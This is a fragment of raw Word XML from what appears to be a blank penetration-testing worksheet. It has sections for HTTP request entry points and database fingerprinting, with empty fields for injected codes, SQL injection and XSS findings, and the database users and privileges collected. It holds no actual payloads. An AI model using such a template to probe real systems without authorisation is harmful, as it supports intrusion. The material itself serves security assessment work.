                <w:numId w:val="11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166A2AA" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF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A2EF9" w:rsidRPr="00FA2EF9" w14:paraId="36A93D36" w14:textId="77777777" w:rsidTr="007655A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7AAA012" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="007655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A2EF9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77CBA88E" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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B0E3D81" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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C5A69AF" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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3954706" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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0D292F6" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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95CC2C8" w14:textId="77777777" w:rsidR="00FA2EF9" w:rsidRPr="00FA2EF9" w:rsidRDefault="00FA2EF9" w:rsidP="00FA2EF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2B17FDFD" w14:textId="77777777" w:rsidR="007D3247" w:rsidRPr="00A51A96" w:rsidRDefault="007D3247" w:rsidP="007D3247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3247" w14:paraId="26D74076" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52779B5D" w14:textId="77777777" w:rsidR="007D3247" w:rsidRDefault="007D3247" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5190316D" w14:textId="77777777" w:rsidR="007D3247" w:rsidRDefault="007D3247" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23C4F8FE" w14:textId="77777777" w:rsidR="007D3247" w:rsidRDefault="007D3247" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5690EC4F" w14:textId="77777777" w:rsidR="007D3247" w:rsidRDefault="007D3247" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10C669D8" w14:textId="77777777" w:rsidR="007D3247" w:rsidRDefault="007D3247" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AD240EF" w14:textId="77777777" w:rsidR="004F12F6" w:rsidRDefault="004F12F6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96013C" w:rsidRPr="00A51A96" w14:paraId="19E64588" w14:textId="77777777" w:rsidTr="007E3C59">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0424FC0E" w14:textId="4D9B030A" w:rsidR="0096013C" w:rsidRPr="003C713F" w:rsidRDefault="0096013C" w:rsidP="00725128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7.3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6C41CA" w:rsidRPr="006C41CA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Entry Points in HTTP Requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64C64CAB" w14:textId="77777777" w:rsidR="007D3247" w:rsidRPr="00BE2BA9" w:rsidRDefault="007D3247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9E461C" w:rsidRPr="009E461C" w14:paraId="1ABFAFC2" w14:textId="77777777" w:rsidTr="00BE2BA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34EBB46" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BE2B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E461C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2E735CE6" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="009E461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E461C" w:rsidRPr="009E461C" w14:paraId="25E0D1AC" w14:textId="77777777" w:rsidTr="00BE2BA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6C674E7" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BE2B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E461C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467F8A13" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="009E461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E461C" w:rsidRPr="009E461C" w14:paraId="7326FAFF" w14:textId="77777777" w:rsidTr="00BE2BA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CD87400" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BE2B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E461C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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56E6E689" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="009E461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E461C" w:rsidRPr="009E461C" w14:paraId="440B2835" w14:textId="77777777" w:rsidTr="00BE2BA9">
        <w:trPr>
          <w:trHeight w:val="3446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977F1B0" w14:textId="1A064F0B" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="000C27A2" w:rsidP="00BE2B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C27A2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Detected GET Request Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="497FB9E3" w14:textId="453F4ABF" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="00696FB6" w:rsidP="009E461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96FB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[*List of Parameters Extracted from URL Queries]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E461C" w:rsidRPr="009E461C" w14:paraId="7AEEF4B1" w14:textId="77777777" w:rsidTr="00BE2BA9">
        <w:trPr>
          <w:trHeight w:val="233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B1264EC" w14:textId="38AF1999" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="00696FB6" w:rsidP="00BE2B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96FB6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Detected POST Request Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C5429D7" w14:textId="77777777" w:rsidR="009E461C" w:rsidRDefault="00696FB6" w:rsidP="009E461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96FB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[*List of Parameters Extracted from HTTP Body]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA6EAAE" w14:textId="77777777" w:rsidR="008227B7" w:rsidRDefault="008227B7" w:rsidP="009E461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BB6B29D" w14:textId="27E8DFC1" w:rsidR="008227B7" w:rsidRPr="009E461C" w:rsidRDefault="008227B7" w:rsidP="009E461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461C16" w:rsidRPr="009E461C" w14:paraId="088DB17C" w14:textId="77777777" w:rsidTr="00BE2BA9">
        <w:trPr>
          <w:trHeight w:val="17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1A97300" w14:textId="4A0ABDCC" w:rsidR="00461C16" w:rsidRPr="009E461C" w:rsidRDefault="00C71AB7" w:rsidP="00BE2B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C71AB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Vulnerabilities Identified in GET Requests?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CAD89D6" w14:textId="4515DC2D" w:rsidR="00461C16" w:rsidRPr="00C71AB7" w:rsidRDefault="00C71AB7" w:rsidP="00461C1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C71AB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[*Yes/No, Potential Exploits: Parameter Tampering, SQL Injection, etc.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00931127" w:rsidRPr="009E461C" w14:paraId="1EDAEC3C" w14:textId="77777777" w:rsidTr="00BE2BA9">
        <w:trPr>
          <w:trHeight w:val="17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835981B" w14:textId="1BD71D24" w:rsidR="00931127" w:rsidRPr="00C71AB7" w:rsidRDefault="00C871F2" w:rsidP="00BE2B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C871F2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Vulnerabilities Identified in POST Requests?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B192630" w14:textId="6297958D" w:rsidR="00931127" w:rsidRPr="00C71AB7" w:rsidRDefault="00C871F2" w:rsidP="00461C1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C871F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Potential Exploits: CSRF, XSS, Injection Attacks,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C871F2" w:rsidRPr="009E461C" w14:paraId="7B33197B" w14:textId="77777777" w:rsidTr="00BE2BA9">
        <w:trPr>
          <w:trHeight w:val="17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C23347C" w14:textId="64300614" w:rsidR="00C871F2" w:rsidRPr="00C871F2" w:rsidRDefault="00C871F2" w:rsidP="00BE2B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C871F2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Observed User-Agent Manipulation Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA12C74" w14:textId="4D9AE1F5" w:rsidR="00C871F2" w:rsidRDefault="00C871F2" w:rsidP="00461C1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937896" w:rsidRPr="0093789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Possible Exploits: Bypassing Security Controls, Fingerprinting, etc.</w:t>
            </w:r>
            <w:r w:rsidR="0093789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937896" w:rsidRPr="009E461C" w14:paraId="4656B795" w14:textId="77777777" w:rsidTr="00BE2BA9">
        <w:trPr>
          <w:trHeight w:val="17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EAA9903" w14:textId="64730568" w:rsidR="00937896" w:rsidRPr="00C871F2" w:rsidRDefault="00937896" w:rsidP="00BE2B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37896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Impact of Referer Header Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01BCE2D5" w14:textId="500B43AE" w:rsidR="00937896" w:rsidRDefault="00937896" w:rsidP="00461C1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93789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Exploitable Misconfigurations: Session Fixation, Spoofing,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937896" w:rsidRPr="009E461C" w14:paraId="2A7E873A" w14:textId="77777777" w:rsidTr="00BE2BA9">
        <w:trPr>
          <w:trHeight w:val="179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7D5269F" w14:textId="19B9CB07" w:rsidR="00937896" w:rsidRPr="00937896" w:rsidRDefault="009D5571" w:rsidP="00BE2B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D5571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Identified Weak Content-Type Handling?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="773795E6" w14:textId="4B7E1172" w:rsidR="00937896" w:rsidRDefault="009D5571" w:rsidP="00461C1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9D557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Risk of Bypassing Input Validation, MIME-Type Attacks,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9D5571" w:rsidRPr="009E461C" w14:paraId="4A681DD8" w14:textId="77777777" w:rsidTr="00226AD0">
        <w:trPr>
          <w:trHeight w:val="134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EF6F312" w14:textId="6C2E351B" w:rsidR="009D5571" w:rsidRPr="009D5571" w:rsidRDefault="009D5571" w:rsidP="00BE2B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Other Vulnerabilities Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22D7C332" w14:textId="77777777" w:rsidR="009D5571" w:rsidRDefault="009D5571" w:rsidP="00461C1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E461C" w:rsidRPr="009E461C" w14:paraId="6211C45F" w14:textId="77777777" w:rsidTr="00BE2BA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2E6912D" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BE2B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E461C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225C427E" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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86F98C4" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="116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C446B7E" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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7DCCE3C" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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CE0D19B" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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7D5D9CF" w14:textId="77777777" w:rsidR="009E461C" w:rsidRPr="009E461C" w:rsidRDefault="009E461C" w:rsidP="009E461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077352F2" w14:textId="77777777" w:rsidR="005D2C80" w:rsidRPr="005D2C80" w:rsidRDefault="005D2C80" w:rsidP="005D2C80">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b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D2C80" w:rsidRPr="005D2C80" w14:paraId="60EAF5A8" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E41BED7" w14:textId="77777777" w:rsidR="005D2C80" w:rsidRPr="005D2C80" w:rsidRDefault="005D2C80" w:rsidP="005D2C80">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B432F65" w14:textId="77777777" w:rsidR="005D2C80" w:rsidRPr="005D2C80" w:rsidRDefault="005D2C80" w:rsidP="005D2C80">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B7E281C" w14:textId="77777777" w:rsidR="005D2C80" w:rsidRPr="005D2C80" w:rsidRDefault="005D2C80" w:rsidP="005D2C80">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01D57BBD" w14:textId="77777777" w:rsidR="005D2C80" w:rsidRPr="005D2C80" w:rsidRDefault="005D2C80" w:rsidP="005D2C80">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75F8B2A9" w14:textId="77777777" w:rsidR="005D2C80" w:rsidRPr="005D2C80" w:rsidRDefault="005D2C80" w:rsidP="005D2C80">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="212A54AC" w14:textId="77777777" w:rsidR="0035449D" w:rsidRDefault="0035449D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EB5C95" w:rsidRPr="00A51A96" w14:paraId="2E00640E" w14:textId="77777777" w:rsidTr="00226AD0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="30A46696" w14:textId="020BAF8B" w:rsidR="00EB5C95" w:rsidRPr="003C713F" w:rsidRDefault="00EB5C95" w:rsidP="00725128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7.4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331B37" w:rsidRPr="00331B37">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Perform Database Fingerprinting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B1DA87E" w14:textId="77777777" w:rsidR="005D2C80" w:rsidRPr="00226AD0" w:rsidRDefault="005D2C80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481"/>
        <w:gridCol w:w="3525"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF0611" w:rsidRPr="00BF0611" w14:paraId="6832E1AF" w14:textId="77777777" w:rsidTr="00226AD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30226A3" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00226AD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F0611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FAEF807" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF061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490F5D0" w14:textId="77777777" w:rsidR="00FA02DD" w:rsidRPr="00BF0611" w:rsidRDefault="00FA02DD" w:rsidP="00BF061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F0611" w:rsidRPr="00BF0611" w14:paraId="07005043" w14:textId="77777777" w:rsidTr="00226AD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308EE77" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00226AD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F0611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99E8F7A" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF061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8B0F053" w14:textId="77777777" w:rsidR="00FA02DD" w:rsidRPr="00BF0611" w:rsidRDefault="00FA02DD" w:rsidP="00BF061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F0611" w:rsidRPr="00BF0611" w14:paraId="5075BBD3" w14:textId="77777777" w:rsidTr="00226AD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213D5F9" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00226AD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F0611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E049285" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF061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F0611" w:rsidRPr="00BF0611" w14:paraId="633F0BDD" w14:textId="77777777" w:rsidTr="00226AD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FB380BE" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00226AD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F0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>List of Inject Codes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45ED2DD" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="117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4CC39F5" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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9D84565" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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8EB01EB" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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AB56021" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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B35779A" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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D3A2FD3" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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C49AC9C" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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16FB95B" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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626CC58" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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97A4892" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF061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F0611" w:rsidRPr="00BF0611" w14:paraId="08D8DEB7" w14:textId="77777777" w:rsidTr="00226AD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4B6FCD3" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00226AD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F0611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Error Generation by Injecting Codes into the Input Fields is Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="348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B0DCE77" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="120"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="1026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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="352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BB6A4B0" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="120"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="965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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF0611" w:rsidRPr="00BF0611" w14:paraId="0D9A65F2" w14:textId="77777777" w:rsidTr="00226AD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2E4BFBE" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00226AD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F0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Information Collected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C9C846A" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF061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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Database Name:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B908651" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Version:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="327D978F" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Users:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172C2364" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Output Mechanism:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13567006" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Database Type:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76144E99" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>User Privilege Level:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04183B2C" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>OS Interaction Level:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30A2B691" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Error Messages Info:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D429943" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611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BF0611">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Others:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EFE8F36" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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6C8C56F" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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F4B23B8" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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0A60F00" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF061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F0611" w:rsidRPr="00BF0611" w14:paraId="4E3A35E9" w14:textId="77777777" w:rsidTr="00226AD0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7459A73" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00226AD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F0611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4432E0E" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
